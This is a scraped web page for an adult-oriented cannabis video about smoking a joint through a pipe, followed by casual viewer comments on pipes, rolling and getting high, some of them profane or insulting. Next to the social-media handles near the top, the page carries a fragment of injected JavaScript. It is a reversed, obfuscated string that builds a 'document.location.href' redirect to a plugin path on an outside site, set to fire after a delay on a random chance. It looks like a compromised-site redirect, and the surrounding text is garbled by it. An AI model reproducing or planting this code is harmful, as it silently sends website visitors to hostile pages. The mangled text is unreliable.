(18+) Smoking a joint through a pipe, just why… Snapchat/IG: MyStoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tonerrLife
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Mom Snapchat: Stoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tonerrMama

Youtube Channel


  1. Johnny Lopez says:

    goshdarn it

  2. Bobby Sharp says:

    aye Brandon I love your channel keep it up I always watch ur channel every time this a new vid

  3. M.M F.M says:


  4. Karalyn K says:

    I absolutely love that grinch pipe

  5. Matthew Flores says:

    Ive never seen that before, im gonna try it, i like your pieces too

  6. Mjstoner420 says:

    That grinch pipe is the bomb!

  7. Amanda Smith says:

    i have a one hitter i put my roaches in

  8. Trevor Standing Soldier says:

    no seriously though… why?

  9. Favorite Color Green says:

    24 thousand peaceful stoners

  10. Israel Addington says:

    you should have put it into the actual bowl and made it a time bomb

  11. Aram Avd says:

    Tone down the enthusiasm bro, it sounds like your talking to us like we're 10 years old. I like your channel though keep up the consistency.

  12. Ivan Salinas says:

    the face u make when u cough bro. it's so cool lol

  13. fenrirdies says:

    I put the joint in the mouthpiece and pull from the bowl sorta like an inhaler. it's smoother that way because the smoke as farther to travel but a one hitter works just as well.

  14. mrsjokerstout says:

    Yes using saliva on a joint or a blunt below where it is running can stop the run if you do it properly. I do love your glass!

  15. Paige Robbins says:

    Loved the video, and I love the why Wednesdays! Where did you get those awesome pipes???

  16. Rickey S. Johnson says:

    your YouTube video bro it's all staticky and fuzzy

  17. Kevin Crespin says:

    is weed the only drug you do

  18. Bogdan Marton says:

    u burn ur self dude 🙂 ,cool video

  19. Alexander Davis says:

    I subscribed!!!

  20. B Rich says:

    You could have made a timebomb out of it. That way you could've used the carb hole to help you out some.

  21. Mamadou passer says:

    shut the fuck up Aram

  22. escapetheash says:

    by far my most fav video so far amazing idea

  23. Trinidad Nabor says:

    hey can you make a video about having long lay off of smoking i was smoking for 9 years and stopped for 1 year now when i smoke i get paranoid anyone stonerlife or commentors please help.

  24. Trinidad Nabor says:

    hey can you make a video about having long lay off of smoking i was smoking for 9 years and stopped for 1 year now when i smoke i get paranoid anyone stonerlife or commentors please help.

  25. KuShQMx - says:


  26. TruBluGamer says:

    Smoke weed through a dab nail

  27. Makenzie 420 says:

    I love that pipe so much❤️

  28. bob smith says:

    dope pipes!

  29. yo son says:

    he fucked his mom

  30. Presley Carpenter says:

    Hey Brandon? i recommend just try grinding up a gram and getting a pack of papers and rolling a joint by hand because once you learn you'll love em and smoke em all the time trust me and never quit halfway through because it can look like a pretzel at first but end up a wiz khalifa rolled joint just practice practice practice!

  31. Stephen Williams says:

    This was the greatest video to watch baked as fuck.

  32. dreamify5786 says:

    Love that little grinch pipe 😀 so festive

  33. Graham R. Pierce says:

    just take some bong rips. keep it simple..

  34. Shane Svage says:

    3:15 stupid ass laugh

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